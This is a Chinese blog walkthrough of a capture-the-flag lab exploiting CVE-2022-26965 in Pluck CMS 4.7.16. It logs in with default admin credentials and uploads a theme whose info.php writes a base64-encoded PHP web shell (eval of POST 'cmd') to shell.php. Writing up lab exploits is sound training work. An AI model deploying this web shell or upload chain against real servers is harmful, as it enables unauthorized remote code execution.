CVE-2022-26965

最新推荐文章于 2024-07-04 11:23:00 发布
最新推荐文章于 2024-07-04 11:23:00 发布
阅读量161 收藏
点赞数
分类专栏: 春秋云境 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longlangci/article/details/131350035
版权

文章目录

CVE-2022-26965

一、漏洞介绍

Pluck-CMS-Pluck-4.7.16 后台RCE

二、渗透步骤
1、打开网站
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/?file=cm

在这里插入图片描述

2、登录后台
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/login.php

# 账号:admin
# 密码:admin

在这里插入图片描述

在这里插入图片描述

3、更换语言
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/admin.php?action=language

在这里插入图片描述

4、安装主题
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/admin.php?action=theme

在这里插入图片描述

4、下载主题

https://github.com/billcreswell/redline-theme

在这里插入图片描述

5、修改info.php文件
<?php
file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSkgPz4='));
?>
6、压缩文件

在这里插入图片描述

7、文件上传
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/admin.php?action=themeinstall

在这里插入图片描述

8、查看flag值
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/shell.php

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

liebe1*1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
春秋云境:CVE-2022-26965
一只爱吃橙子的羊
11-29 2544
Pluck-CMS-Pluck-4.7.16 后台RCE
春秋云境CVE-2022-26965
2303_76653367的博客
05-14 288
Pluck-CMS-Pluck-4.7.16 后台RCE。
春秋云境:CVE-2022-26965(后台RCE)
m0_65712192的博客
04-21 1582
Pluck-CMS-Pluck-4.7.16 后台RCE
[春秋云镜]CVE-2022-26965 XStream Pluck-CMS-Pluck-4.7.16 后台RCE
b1n的博客
08-23 458
Pluck-CMS-Pluck-4.7.16 后台RCE。
CVE漏洞复现-CVE-2022-22965-Spring-RCE漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-11 1931
Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。受影响范围:JDK >= 9不受影响的版本JDK < 9。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
Pluck 代码问题漏洞( CVE-2022-26965)
千寻的博客
12-01 1941
Pluck-CMS-Pluck-4.7.16 后台RCE
利用cms主题构造木马(CVE-2022-26965)
热门推荐
Battery的博客
09-18 10万+
CVE-2022-26965是Pluck CMS 4.7.16版本存在一个1。攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。
春秋云镜 CVE-2022-26965
qq_22002773的博客
06-29 389
春秋云镜 CVE-2022-26965
Pluck-CMS-Pluck-4.7.16 远程代码执行漏洞(CVE-2022-26965
最新发布
Flag少侠的博客
07-04 1万+
打开靶场来到首页,点击 admin 登录默认密码是 admin登录成功后页面如下点击选择主题(图片试了下不行)左边点击下载主题可以看到这里要咱上传文件下载一个轻量主题包链接先编码一下木马,再通过 PHP 生成一个一句话木马文件是一个用于将数据写入文件的 PHP 函数。它的基本用法是将一个字符串写入指定的文件中,如果文件不存在则创建它。这个函数具有以下语法:$filename是要写入数据的目标文件名。$data是要写入的数据,可以是字符串、数组或者通过fopen返回的文件指针。
春秋云镜靶场记录
wanan的博客
01-19 446
春秋云镜靶场记录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值